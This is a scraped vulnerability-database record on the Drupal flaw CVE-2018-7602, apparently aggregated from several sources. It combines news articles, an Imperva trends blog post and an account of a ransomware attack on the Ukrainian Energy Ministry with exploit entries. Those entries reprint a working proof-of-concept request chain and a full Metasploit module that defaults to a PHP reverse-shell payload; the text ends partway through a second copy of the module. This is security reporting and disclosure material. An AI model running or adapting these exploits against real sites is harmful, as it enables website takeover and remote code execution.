"[](<https://1.bp.blogspot.com/-UXNjejbbqro/WuHDxyHAooI/AAAAAAAAwdM/yTGfiL9DknsnLaj9Z4dNy7xHoeZPrXinwCLcBGAs/s1600-e20/drupal-hacking.png>)\n\nOnly a few hours after the Drupal team releases latest updates to fix a new remote code execution flaw in its content management system software, hackers have already started exploiting the vulnerability in the wild. \n \nAnnounced yesterday, the newly discovered vulnerability ([CVE-2018-7602](<https://thehackernews.com/2018/04/drupal-vulnerability-exploit.html>)) affects Drupal 7 and 8 core and allows remote attackers to achieve exactly same what previously discovered [Drupalgeddon2](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) (CVE-2018-7600) flaw allowed\u2014complete take over of affected websites. \n \nAlthough Drupal team has not released any technical details of the vulnerability to prevent immediate exploitation, two individual hackers have revealed some details, along with a [proof-of-concept exploit](<https://pastebin.com/pRM8nmwj>) just a few hours after the patch release. \n \nIf you have been actively reading every latest story on The Hacker News, you must be aware of how the release of [Drupalgeddon2 PoC exploit](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) derived much attention, which eventually allowed attackers actively hijack websites and [spread cryptocurrency miners](<https://thehackernews.com/2018/04/drupal-cryptocurrency-hacking.html>), backdoors, and other malware. \n \nAs expected, the Drupal team has warned that the new remote code execution flaw, let's refer it **Drupalgeddon3**, is now actively being exploited in the wild, again leaving millions of websites vulnerable to hackers. \n \nIn this article, I have briefed what this new flaw is all about and how attackers have been exploiting it to hack websites running unpatched versions of Drupal. \n\n\n[](<https://1.bp.blogspot.com/-aGyyaDhvYXI/WuHEwO_-DLI/AAAAAAAAwdU/brSU19-lJUkoC7LU-0YR1vh10h9gVLrLQCLcBGAs/s1600-e20/drupal-exploit-code.png>)\n\n \nThe exploitation process of Drupalgeddon3 flaw is somewhat similar to Drupalgeddon2, except it requires a slightly different payload to trick vulnerable websites into executing the malicious payload on the victim's server. \n \nDrupalgeddon3 resides due to the improper input validation in Form API, also known as \"renderable arrays,\" which renders metadata to output the structure of most of the UI (user interface) elements in Drupal. These renderable arrays are a key-value structure in which the property keys start with a hash sign (#). \n \nA Twitter user with handle [@_dreadlocked](<https://twitter.com/_dreadlocked/status/989206562945273859>) explains that the flaw in Form API can be triggered through the \"destination\" GET parameter of a URL that loads when a registered user initiates a request to delete a node; where, a \"node\" is any piece of individual content, such as a page, article, forum topic, or a post. \n \nSince this \"destination\" GET query parameter also accepts another URL (as a value) with its own GET parameters, whose values were not sanitized, it allowed an authenticated attacker to trick websites into executing the code. \n \nWhat I have understood from the PoC exploit released by another Twitter user, using handle [@Blaklis_](<https://twitter.com/Blaklis_/status/989229547030794241?s=08>), is that the unsanitized values pass though stripDangerousValues() function that filters \"#\" character and can be abused by encoding the \"#\" character in the form of \"%2523\". \n \nThe function decodes \"%2523\" into \"%23,\" which is the Unicode version for \"#\" and will be processed to run arbitrary code on the system, such as a whoami utility. \n \nAt first, Drupal developers were skeptical about the possibility of real attacks using the Drupalgeddon3 vulnerability, but after the reports of in-the-wild attacks emerged, Drupal raised the level of danger of the problem to \"Highly critical.\" \n \nTherefore, all Drupal website administrators are highly recommended to update their websites to the latest versions of the software as soon as possible.\n", "modified": "2018-04-26T12:32:45", "published": "2018-04-26T01:32:00", "id": "THN:F8EDB5227B5DA0E4B49064C2972A193D", "href": "https://thehackernews.com/2018/04/drupalgeddon3-exploit-code.html", "type": "thn", "title": "Release of PoC Exploit for New Drupal Flaw Once Again Puts Sites Under Attack", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-26T14:07:58", "bulletinFamily": "info", "cvelist": ["CVE-2018-7600", "CVE-2018-7602"], "description": "[](<https://1.bp.blogspot.com/-nI78JCGBjaE/WuCp9Z3ptKI/AAAAAAAAwcQ/XnP5D9Is0Z4NbW1Yo0LuebQ2_RxM9oa9QCLcBGAs/s1600-e20/drupal-patch-update.png>)\n\nDamn! You have to update your Drupal websites. \n \nYes, of course once again\u2014literally it\u2019s the third time in last 30 days. \n \nAs [notified](<https://www.drupal.org/psa-2018-003>) in advance two days back, Drupal has now released new versions of its software to patch yet another critical remote code execution (RCE) vulnerability, affecting its Drupal 7 and 8 core. \n \nDrupal is a popular open-source content management system software that powers millions of websites, and unfortunately, the CMS has been under active attacks since after the disclosure of a highly critical remote code execution vulnerability. \n \nThe new vulnerability was discovered while exploring the previously disclosed RCE vulnerability, dubbed **[Drupalgeddon2](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>)** (CVE-2018-7600) that was patched on March 28, forcing the Drupal team to release this follow-up patch update. \n \nAccording to a new [advisory](<https://www.drupal.org/sa-core-2018-004>) released by the team, the new remote code execution vulnerability (CVE-2018-7602) could also allow attackers to take over vulnerable websites completely. \n \n\n\n### How to Patch Drupal Vulnerability\n\n[](<https://1.bp.blogspot.com/-zI_GNj80adw/WuC42gTf-5I/AAAAAAAAwcg/BiiIUAQK33MSqQwCkvfkyFi1l0BAq_wpACLcBGAs/s1600-e20/drupal.png>)\n\n \nSince the previously disclosed flaw derived much attention and motivated attackers to target websites running over Drupal, the company has urged all website administrators to install new security patches as soon as possible. \n\n\n * If you are running 7.x, upgrade to Drupal 7.59.\n * If you are running 8.5.x, upgrade to Drupal 8.5.3.\n * If you are running 8.4.x, which is no longer supported, you need first to update your site to 8.4.8 release and then install the latest 8.5.3 release as soon as possible.\nIt should also be noted that the new patches will only work if your site has already applied patches for Drupalgeddon2 flaw. \n\n\n> \"We are not aware of any active exploits in the wild for the new vulnerability,\" a drupal spokesperson told The Hacker News. \"Moreover, the new flaw is more complex to string together into an exploit.\"\n\nTechnical details of the flaw, can be named **Drupalgeddon3**, have not been released in the advisory, but that does not mean you can wait until next morning to update your website, believing it won't be attacked. \n \nWe have seen how attackers developed [automated exploits](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) leveraging Drupalgeddon2 vulnerability to [inject cryptocurrency miners](<https://thehackernews.com/2018/04/drupal-cryptocurrency-hacking.html>), backdoors, and other malware into websites, within few hours after it's detailed went public. \n \nBesides these two flaws, the team also patched a moderately critical [cross-site scripting (XSS) vulnerability](<https://thehackernews.com/2018/04/drupal-site-vulnerability.html>) last week, which could have allowed remote attackers to pull off advanced attacks including cookie theft, keylogging, phishing and identity theft. \n \nTherefore, Drupal website admins are highly recommended to update their websites as soon as possible.\n", "modified": "2018-04-26T11:04:51", "published": "2018-04-25T05:41:00", "id": "THN:8E5D44939B2B2FF0156F7FF2D4802857", "href": "https://thehackernews.com/2018/04/drupal-vulnerability-exploit.html", "type": "thn", "title": "Third Critical Drupal Flaw Discovered\u2014Patch Your Sites Immediately", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "impervablog": [{"lastseen": "2019-01-27T14:50:26", "bulletinFamily": "blog", "cvelist": ["CVE-2018-7600", "CVE-2018-7602"], "description": "\n\n_(**Jan. 12 update: ** Due to a data transfer error, some of the 2017 figures were incorrectly reported; this version of the blog has been corrected. This error did not affect our 2018 statistics, nor our conclusions.)_\n\nAs a web application firewall provider, part of our job at Imperva is to continually monitor for new security vulnerabilities. To do this, we use internal software that collects information from various data sources such as vulnerability databases, newsletters, forums, social media and more, integrates it into a single repository, and assesses each vulnerability\u2019s priority. Having this kind of data puts us in a unique position to provide an analysis of all web application vulnerabilities throughout the year, view trends, and notice significant changes in the security landscape. As we did _[last year](<https://www.imperva.com/blog/the-state-of-web-application-vulnerabilities-in-2017/>)_, we took a look back at 2018 to understand the changes and trends in web application security over the past year.\n\nThe bad news is that in 2018, like _[2017](<https://www.imperva.com/blog/the-state-of-web-application-vulnerabilities-in-2017/>)_, we continued to see a **trend of increasing number of web application vulnerabilities**, particularly vulnerabilities related to _[injection](<https://www.owasp.org/index.php/Top_10-2017_A1-Injection>)_ such as _[SQL injection](<https://www.imperva.com/app-security/threatglossary/sql-injection/>)_, command injection, object injection, etc. On the content management system (CMS) front, **WordPress vulnerabilities continue to grow, **and they continue to dominate in terms of the number of vulnerabilities published in the CMS category. Although WordPress leads the pack in sheer vulnerabilities numbers, **Drupal ****vulnerabilities had a larger effect and were used in mass attacks **that targeted hundreds of thousands of sites during 2018. However, there is some good news for the security industry \u2014 the number of **Internet of Things (IoT) vulnerabilities declined**, as well as the number of vulnerabilities related to weak authentication. In the server side technologies category, the **number of PHP vulnerabilities continued to decline**. In addition, the **growth in API vulnerabilities also slightly declined**.\n\n## 2018 Web Application Vulnerabilities Statistics\n\nThe first phase in our yearly analysis was to check the amount of vulnerabilities published in 2018 in comparison to previous years. Figure 1 shows the number of vulnerabilities on a monthly basis over the last three years. We can see that the overall number of new vulnerabilities in 2018 (17,308) increased by 23% compared to 2017 (14,082) and by 162% compared to 2016 (6,615). According to our data, more than half of web application vulnerabilities (54%) have a public exploit available to hackers. In addition, more than a third (38%) of web application vulnerabilities don\u2019t have an available solution, such as a software upgrade workaround or software patch.\n\n \n\n \n_Figure 1: Number of web application vulnerabilities in 2016-2018_\n\n## Vulnerabilities by Category\n\nIn Figure 2, you can find 2018 vulnerabilities split into _[OWASP TOP 10 2017](<https://www.imperva.com/app-security/owasp-top-10/>)_ categories.\n\n## Most Common Vulnerability: Injections\n\nThe dominant category this year was by far **injections**, with 19% (3,294) out of the total vulnerabilities of 2018, which is also a 267% increase from last year. When talking about injection vulnerabilities, the first thing that jumps to mind is SQL injections. When drilling down the data, however, we saw remote command execution (RCE) emerge as the bigger issue, with 1,980 vulnerabilities (11.5%), compared to 1,354 vulnerabilities (8%) for SQLi.\n\n_Figure 2: Vulnerabilities into categories 2014-2018_\n\n## No. 2 Vulnerability \u2014 Cross-Site Scripting\n\nThe number of Cross-site scripting (XSS) vulnerabilities continued to grow and appears to be the second most common vulnerability (14%) among 2018 web application vulnerabilities.\n\n## IoT Vulnerabilities Decreased\n\nIt appears that the number of IoT vulnerabilities has decreased tremendously. Despite the common belief that all our electronic devices can be easily compromised, it appears that something has changed in this area. Possible explanations include: IoT vendors have finally started to implement better security in IoT devices, or that hackers and researchers found another area to focus on in 2018.\n\n \n_Figure 3: IoT vulnerabilities 2014-2018_\n\n## API Vulnerabilities: Growing, but Slowing\n\nAPI (Application Programming Interface) vulnerabilities are becoming more widespread as time goes by. Figure 4 shows the number of API vulnerabilities between 2015-2018. New API vulnerabilities in 2018 (264) increased by 23% over 2017 (214), by 56% compared to 2016 (169), and by 154% compared to 2015 (104).\n\n \n_Figure 4: API vulnerabilities 2015-2018_\n\nAlthough API vulnerabilities continue to grow year-over-year, it appears to be slowing, from 63% between 2015-16 to 27% in 2016-2017 and now 23% between 2017-18. One possible explanation is that since APIs are more popular nowadays, they draw more attention from hackers and security researchers. In turn, organizations spend more time securing their APIs.\n\n## Vulnerabilities in Content Management Systems: Attackers Focused on WordPress\n\nThe most popular content management system is _[WordPress](<https://en.wikipedia.org/wiki/WordPress>)_, used by over 28% of all websites, and by 59% of all websites using a known content management system, according to market share statistics cited by Wikipedia, followed by _[Joomla](<https://en.wikipedia.org/wiki/Joomla>) _and _[Drupal](<https://en.wikipedia.org/wiki/Drupal>)_. Perhaps unsurprisingly, WordPress also registered the highest number of vulnerabilities (542) last year, which is a 30% increase from 2017 (Figure 5).\n\n \n_Figure 5: Number of vulnerabilities by CMS platform 2016-2018_\n\nAccording to the _[WordPress ](<https://wordpress.org/plugins/>)_official site, the current number of plugins is 55,271. This means that only 1,914 (3%) were added in 2018.\n\n \n_Figure 6: Number of WordPress plugins_\n\nDespite the slowed growth in new plugins, **the number of WordPress vulnerabilities increased.** The explanation for this could either be the code quality of the plugins, or the fact that WordPress is such a popular CMS, which motivate more attackers to develop dedicated attack tools and try their luck searching for holes in the code.\n\nUnsurprisingly, 98% of WordPress vulnerabilities are related to _[plugins](<https://en.wikipedia.org/wiki/WordPress>)_[ ](<https://en.wikipedia.org/wiki/WordPress>)(see Figure 7 below), which extend the functionality and features of a website or a blog. Anyone can create a plugin and publish it \u2014 WordPress is open source, easy to manage, and there is no enforcement or any proper process that mandates minimum security standards (e.g. code analysis). Hence, WordPress plugins are prone to vulnerabilities.\n\n \n_Figure 7: WordPress third party vendor vulnerabilities in 2018_\n\nIn Figure 8 below, you can find the ten WordPress plugins with the most vulnerabilities discovered in 2018. Note that these are not necessarily the most-attacked plugins as the report refers to the amount of vulnerabilities seen throughout the year \u2013 and is based upon the continual aggregation of vulnerabilities from different sources. Our annual report is solely based on statistics from this system, and we listed all vulnerabilities that were published during 2018 in general, in WordPress and WordPress plugins._ _This indicator solely looks at the most vulnerabilities. There are other measures that are not included in the report - such as \u2018top attacked\u2019 or \u2018riskiest\u2019 - which do not necessarily correlate with this measurement.\n\n \n\n\n \n_Figure 8: Top 10 vulnerable WordPress plugins in 2018_\n\n## Server Technologies: PHP Vulnerabilities Fell\n\nSince the most popular server-side programming language for websites continues to be PHP, we expect it to have more vulnerabilities than equivalent languages. And that was true. However, as Figure 9 below shows, new vulnerabilities in PHP fell in 2018 versus 2017, just as they did in the prior year. The lack of PHP updates - only one minor update was released, PHP 7.3, in December - could explain why.\n\n \n_Figure 9: Top server-side technology vulnerabilities 2014-2018_\n\n## The Year of Drupal\n\nAlthough Drupal _[is the third-most](<https://w3techs.com/technologies/overview/content_management/all>) _popular CMS, two of its vulnerabilities, _[CVE-2018-7600](<https://www.imperva.com/blog/drupalgeddon-2-0-are-hackers-slacking-off/>) _('23-mar' bar in Figure 10 below), and _[CVE-2018-7602 ](<https://www.imperva.com/blog/just-third-critical-drupal-flaw-discovered/>)_('25-apr' bar below, also known as _[Drupalgeddon2 ](<https://www.imperva.com/blog/drupalgeddon-2-0-are-hackers-slacking-off/>)_and _[Drupalgeddon3](<https://www.imperva.com/blog/just-third-critical-drupal-flaw-discovered/>)_), were the root cause of many security breaches in hundreds of thousands of web servers in 2018. These vulnerabilities allowed an unauthenticated attacker to remotely inject malicious code and run it on default or common Drupal installations. These vulnerabilities allow attackers to connect to backend databases, scan and infect internal networks, mine cryptocurrencies, infect clients with trojans, and more.\n\nThe simplicity of these Drupal vulnerabilities and their catastrophic impact made them a weapon of choice for many attackers. In fact, Imperva detected and blocked more than half a million attacks related to these vulnerabilities during 2018. These attacks were also the basis for a few interesting _[blogs ](<https://www.incapsula.com/blog/crypto-me0wing-attacks-kitty-cashes-in-on-monero.html>)_we wrote this year. There was another risky vulnerability, part of the Drupal security patch _[sa-core-2018-006](<https://www.drupal.org/sa-core-2018-006>)_, that published in October. However, since it was not easy to exploit, the number of attacks was small.\n\n \n\n_Figure 10: CVSS Score of Drupal vulnerabilities in 2018_\n\n## Predictions for 2019\n\nAs a security vendor, we\u2019re often asked about our predictions. Here are our vulnerability predictions for 2019:\n\n * PHP announced that versions 5.5, 5.6 and 7.0 reached their _[end of life](<https://secure.php.net/supported-versions.php>)_. That means that these versions will no longer receive security updates. Major CMS like WordPress, Drupal, and Joomla are developed in PHP and require newer versions of PHP. However, they still support older versions. The result is that hackers are now motivated to find new security vulnerabilities in unsupported PHP versions since they will not be fixed and impact every application built with these outdated versions. For example, according to _[Shodan](<https://www.shodan.io/search?query=php%2F5>)_ there are currently 34K servers with these unsupported PHP versions\n * Injection vulnerabilities will continue to grow mainly because of the economic implications to attackers (make fast money)\n * More vulnerabilities in APIs will be discovered as DevOps become a crucial factor in IT and their usage and demand for APIs is growing\n\n## How to Protect Your Apps and Data\n\nOne of the best solutions for protecting against web application vulnerabilities is to deploy a web application firewall (WAF). A WAF may be either on-premises, in the cloud or _[a combination of both](<https://www.imperva.com/blog/2017/11/cloud-waf-versus-on-premises-waf/>)_ depending on your needs, infrastructure, and more. As organizations are moving more of their apps and data to the cloud, it\u2019s important to think through your security _[requirements](<https://www.imperva.com/blog/2017/06/waf-requirements-and-deployment-options-for-the-cloud/>)_. A solution supported by a dedicated security team is one to add to your selection criteria. Security teams can push timely security updates to a WAF in order to properly defend your assets.\n\n \n\n \n\nThe post [The State of Web Application Vulnerabilities in 2018](<https://www.imperva.com/blog/the-state-of-web-application-vulnerabilities-in-2018/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "modified": "2019-01-09T14:00:26", "published": "2019-01-09T14:00:26", "id": "IMPERVABLOG:B21E6C61B26ED07C8D647C57348C4F9E", "href": "https://www.imperva.com/blog/the-state-of-web-application-vulnerabilities-in-2018/", "type": "impervablog", "title": "The State of Web Application Vulnerabilities in 2018", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "threatpost": [{"lastseen": "2019-04-25T05:50:09", "bulletinFamily": "info", "cvelist": ["CVE-2018-7602"], "description": "The Ukrainian Energy Ministry has been hit by a ransomware attack \u2013 and for once it looks like this is the work of amateurs, not nation-state attackers bent on making a geopolitical point. However, the bad actors appear to have made use of the recently patched Drupal vulnerability, pointing out yet once again that patch management needs to be a top security-posture priority for government and critical infrastructure organizations.\n\nSophisticated APT attackers have repeatedly targeted Ukrainian government networks and critical infrastructure in recent years, and most researchers have pointed the attribution finger squarely towards APTs such as BlackEnergy and threat actors behind malware Bad Rabbit and Petya/ExPetr. However, in this case, the attack seems to be financially motivated.\n\nResearchers suspect that the incident was two-pronged: First, a hacker (going by the handle \u201cX-zakaria,\u201d according to researchers at AlienVault quoted in a[ BBC](<http://www.bbc.com/news/technology-43877677>) report) was able to deface the website, while a second hacker then used the first actor\u2019s backdoor to go in an encrypt the website\u2019s files. The English-language ransom note is demanding 0.1 bitcoin, or about $928 as of this time of writing.\n\n**Limited Damage, Limited Skill**\n\nUkrainian-cyber police spokeswoman Yulia Kvitko called the damage \u201cisolated\u201d, resulting in the defacement and locking up of the ministry website. She [told](<https://www.reuters.com/article/us-china-tech-gender/chinese-tech-giants-government-under-fire-for-men-only-job-ads-idUSKBN1HV0EY>) _Reuters_ that the attacks didn\u2019t affect other government systems or the country\u2019s state-run energy companies.\n\n\u201cThis case is not large-scale. If necessary, we are ready to react and help,\u201d Kvitko said. \u201cOur specialists are working right now \u2026 We do not know how long it will take to resolve the issue. Ukrenergo, Energoatom \u2013 everything is okay with their sites, it\u2019s only our site that does not work.\u201d\n\n\u201cFrom what has been seen, it is clearly multiple cyber-actors, possibly working together, or not, though it\u2019s likely they have been in communication at the minimum,\u201d Joseph Carson, chief security scientist at Thycotic, told Threatpost.\n\nHe added that while the incident shows little advanced skill, it shouldn\u2019t be discounted: \u201cIt\u2019s very likely that the cybercriminals behind this recent cyberattack against the Ukrainian Energy Ministry are testing their new skills in order to improve for a bigger cyberattack later, or to get acceptance into a new underground cyber-group that requires showing a display of skills and ability,\u201d said Carson.\n\nIt\u2019s also interesting to note that the attack used ransomware, which at this point seems almost a throwback threat vector; recently, cryptomining [has gained top billing](<https://threatpost.com/cryptomining-gold-rush-one-gang-rakes-in-7m-over-6-months/130232/>) for financially motivated types, thanks to the skyrocketing value of virtual currencies.\n\n\u201cRansomware has been waning as an overall attack vector, with only one device in every 10,000 showing signs of ransomware for the period of August 2017 through January 2018,\u201d Mike Banic, vice president of marketing at Vectra, told us. \u201cThe [WannaCry](<https://threatpost.com/u-s-government-blames-north-korea-for-wannacry/129201/>) attack collected approximately $72,000 in ransom. The industry responded to the NotPetya and WannaCry attacks by patching Windows systems to remove the Eternal Blue exploit and bolstering their data backup and recovery programs. As ransomware started to wane in 2017, we saw a rise in cryptomining, which has been prevalent in higher-education, technology companies and healthcare organizations.\u201d\n\n**An Avoidable Attack: Drupal Vulnerability Exploited**\n\nThe attackers appear to be exploiting the [Drupalgeddon2](<https://groups.drupal.org/security/faq-2018-002>), a highly critical remote code execution bug affecting most Drupal sites, which was disclosed at the end of March (and since patched). That bug is now being actively exploited by hackers stocked with automated tools, including a newly uncovered botnet, dubbed Muhstik, that we [reported on yesterday](<https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/>).\n\nDrupal also [announced](<https://www.drupal.org/psa-2018-003>) this week that a new vulnerability (details are scant) is being patched April 25.\n\n\u201cLooking over the Internet archive of this site, it appears that they were running Drupal 7, which is currently under active attack by automated attackers armed with Drupalgeddon2 exploits,\u201d Craig Young, security researcher at Tripwire, said via email. \u201cIt is also possible (although less likely) that someone is already exploiting CVE-2018-7602 which the Drupal team announced just yesterday, but has yet to provide a public fix.\u201d\n\nOrganizations \u2013 especially those running critical, strategic networks, it goes without saying \u2013 should know that off-the-shelf content management systems like Drupal, WordPress and Joomla are widely deployed and a key target of automated exploits. In fact, these platforms may start seeing exploitation within days or even hours of a critical disclosure, added Young: \u201cThese public facing systems must be a top priority for infosec teams.\u201d\n", "modified": "2018-04-24T18:34:37", "published": "2018-04-24T18:34:37", "id": "THREATPOST:BBF186A7D1D5679576FBB39E0B3F05F2", "href": "https://threatpost.com/ransomware-attack-hits-ukrainian-energy-ministry-exploiting-drupalgeddon2/131373/", "type": "threatpost", "title": "Ransomware Attack Hits Ukrainian Energy Ministry, Exploiting Drupalgeddon2", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2018-05-24T14:18:14", "description": "Drupal < 7.58 - 'drupalgeddon3' Authenticated Remote Code Execution (PoC). CVE-2018-7602. Webapps exploit for PHP platform", "published": "2018-04-25T00:00:00", "type": "exploitdb", "title": "Drupal < 7.58 - 'drupalgeddon3' Authenticated Remote Code Execution (PoC)", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-7602"], "modified": "2018-04-25T00:00:00", "id": "EDB-ID:44542", "href": "https://www.exploit-db.com/exploits/44542/", "sourceData": "This is a sample of exploit for Drupal 7 new vulnerability SA-CORE-2018-004 / CVE-2018-7602.\r\n\r\nYou must be authenticated and with the power of deleting a node. Some other forms may be vulnerable : at least, all of forms that is in 2-step (form then confirm).\r\n\r\nPOST /?q=node/99/delete&destination=node?q[%2523][]=passthru%26q[%2523type]=markup%26q[%2523markup]=whoami HTTP/1.1\r\n[...]\r\nform_id=node_delete_confirm&_triggering_element_name=form_id&form_token=[CSRF-TOKEN]\r\n\r\nRetrieve the form_build_id from the response, and then triggering the exploit with : \r\n\r\nPOST /drupal/?q=file/ajax/actions/cancel/%23options/path/[FORM_BUILD_ID] HTTP/1.1\r\n[...]\r\nform_build_id=[FORM_BUILD_ID]\r\n\r\nThis will display the result of the whoami command.\r\n\r\nPatch your systems!\r\nBlaklis", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/44542/"}, {"lastseen": "2018-05-24T14:18:52", "description": "Drupal < 7.58 - 'Drupalgeddon3' Authenticated Remote Code (Metasploit). CVE-2018-7602. Webapps exploit for PHP platform. Tags: Metasploit Framework (MSF)", "published": "2018-04-30T00:00:00", "type": "exploitdb", "title": "Drupal < 7.58 - 'Drupalgeddon3' Authenticated Remote Code (Metasploit)", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-7602"], "modified": "2018-04-30T00:00:00", "id": "EDB-ID:44557", "href": "https://www.exploit-db.com/exploits/44557/", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n \r\n include Msf::Exploit::Remote::HttpClient\r\n \r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 'Drupalgeddon3',\r\n 'Description' => %q{\r\n CVE-2018-7602 / SA-CORE-2018-004\r\n A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x.\r\n This potentially allows attackers to exploit multiple attack vectors on a Drupal site\r\n Which could result in the site being compromised.\r\n This vulnerability is related to Drupal core - Highly critical - Remote Code Execution\r\n\r\n The module can load msf PHP arch payloads, using the php/base64 encoder.\r\n\r\n The resulting RCE on Drupal looks like this: php -r 'eval(base64_decode(#{PAYLOAD}));'\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'SixP4ck3r', # Research and port to MSF\r\n 'Blaklis' # Initial PoC\r\n ],\r\n 'References' =>\r\n [\r\n ['SA-CORE', '2018-004'],\r\n ['CVE', '2018-7602'],\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'encoder' => 'php/base64',\r\n 'payload' => 'php/meterpreter/reverse_tcp',\r\n },\r\n 'Privileged' => false,\r\n 'Platform' => ['php'],\r\n 'Arch' => [ARCH_PHP],\r\n 'Targets' =>\r\n [\r\n ['User register form with exec', {}],\r\n ],\r\n 'DisclosureDate' => 'Apr 29 2018',\r\n 'DefaultTarget' => 0\r\n ))\r\n \r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [ true, \"The target URI of the Drupal installation\", '/']),\r\n OptString.new('DRUPAL_NODE', [ true, \"Exist Node Number (Page, Article, Forum topic, or a Post)\", '1']),\r\n OptString.new('DRUPAL_SESSION', [ true, \"Authenticated Cookie Session\", '']),\r\n ])\r\n \r\n register_advanced_options(\r\n [\r\n\r\n ])\r\n end\r\n \r\n def uri_path\r\n normalize_uri(target_uri.path)\r\n end\r\n\r\n def start_exploit\r\n drupal_node = datastore['DRUPAL_NODE']\r\n res = send_request_cgi({\r\n 'cookie' => datastore['DRUPAL_SESSION'],\r\n 'method' => 'GET',\r\n 'uri' => \"#{uri_path}/node/#{drupal_node}/delete\"\r\n })\r\n form_token = res.body.scan( /form_token\" value=\"([^>]*)\" \\/>/).last.first\r\n print \"[*] Token Form -> #{form_token}\\n\"\r\n r2 = send_request_cgi({\r\n 'method' => 'POST',\r\n 'cookie' => datastore['DRUPAL_SESSION'],\r\n 'uri' => \"#{uri_path}/?q=node/#{drupal_node}/delete&destination=node?q[%2523post_render][]=passthru%26q[%2523type]=markup%26q[%2523markup]=php%20-r%20'#{payload.encoded}'\",\r\n 'vars_post' => {\r\n 'form_id' => 'node_delete_confirm',\r\n '_triggering_element_name' => 'form_id',\r\n 'form_token'=> \"#{form_token}\"\r\n }\r\n })\r\n form_build_id = r2.body.scan( /form_build_id\" value=\"([^>]*)\" \\/>/).last.first\r\n print \"[*] Token Form_build_id -> #{form_build_id}\\n\"\r\n r3 = send_request_cgi({\r\n 'method' => 'POST',\r\n 'cookie' => datastore['DRUPAL_SESSION'],\r\n 'uri' => \"#{uri_path}/?q=file/ajax/actions/cancel/%23options/path/#{form_build_id}\",\r\n 'vars_post' => {\r\n 'form_build_id' => \"#{form_build_id}\"\r\n }\r\n })\r\n end\r\n \r\n def exploit\r\n case datastore['TARGET']\r\n when 0\r\n start_exploit\r\n else\r\n fail_with(Failure::BadConfig, \"Your target is invalid.\")\r\n end\r\n end\r\n end", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/44557/"}], "packetstorm": [{"lastseen": "2018-04-27T01:05:58", "description": "", "published": "2018-04-26T00:00:00", "type": "packetstorm", "title": "Drupal drupgeddon3 Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-7602"], "modified": "2018-04-26T00:00:00", "id": "PACKETSTORM:147380", "href": "https://packetstormsecurity.com/files/147380/Drupal-drupgeddon3-Remote-Code-Execution.html", "sourceData": "`This is a sample of exploit for Drupal 7 new vulnerability SA-CORE-2018-004 / CVE-2018-7602. \n \nYou must be authenticated and with the power of deleting a node. Some other forms may be vulnerable : at least, all of forms that is in 2-step (form then confirm). \n \nPOST /?q=node/99/delete&destination=node?q[%2523][]=passthru%26q[%2523type]=markup%26q[%2523markup]=whoami HTTP/1.1 \n[...] \nform_id=node_delete_confirm&_triggering_element_name=form_id&form_token=[CSRF-TOKEN] \n \nRetrieve the form_build_id from the response, and then triggering the exploit with : \n \nPOST /drupal/?q=file/ajax/actions/cancel/%23options/path/[FORM_BUILD_ID] HTTP/1.1 \n[...] \nform_build_id=[FORM_BUILD_ID] \n \nThis will display the result of the whoami command. \n \nPatch your systems! \nBlaklis \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/147380/drupalgeddon3-exec.txt"}, {"lastseen": "2018-05-07T01:19:11", "description": "", "published": "2018-04-30T00:00:00", "type": "packetstorm", "title": "Drupalgeddon3 Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-7602"], "modified": "2018-04-30T00:00:00", "id": "PACKETSTORM:147407", "href": "https://packetstormsecurity.com/files/147407/Drupalgeddon3-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => 'Drupalgeddon3', \n'Description' => %q{ \nCVE-2018-7602 / SA-CORE-2018-004 \nA remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. \nThis potentially allows attackers to exploit multiple attack vectors on a Drupal site \nWhich could result in the site being compromised. \nThis vulnerability is related to Drupal core - Highly critical - Remote Code Execution \n \nThe module can load msf PHP arch payloads, using the php/base64 encoder. \n \nThe resulting RCE on Drupal looks like this: php -r 'eval(base64_decode(#{PAYLOAD}));' \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'SixP4ck3r', # Research and port to MSF \n'Blaklis' # Initial PoC \n], \n'References' => \n[ \n['SA-CORE', '2018-004'], \n['CVE', '2018-7602'], \n], \n'DefaultOptions' => \n{ \n'encoder' => 'php/base64', \n'payload' => 'php/meterpreter/reverse_tcp', \n}, \n'Privileged' => false, \n'Platform' => ['php'], \n'Arch' => [ARCH_PHP], 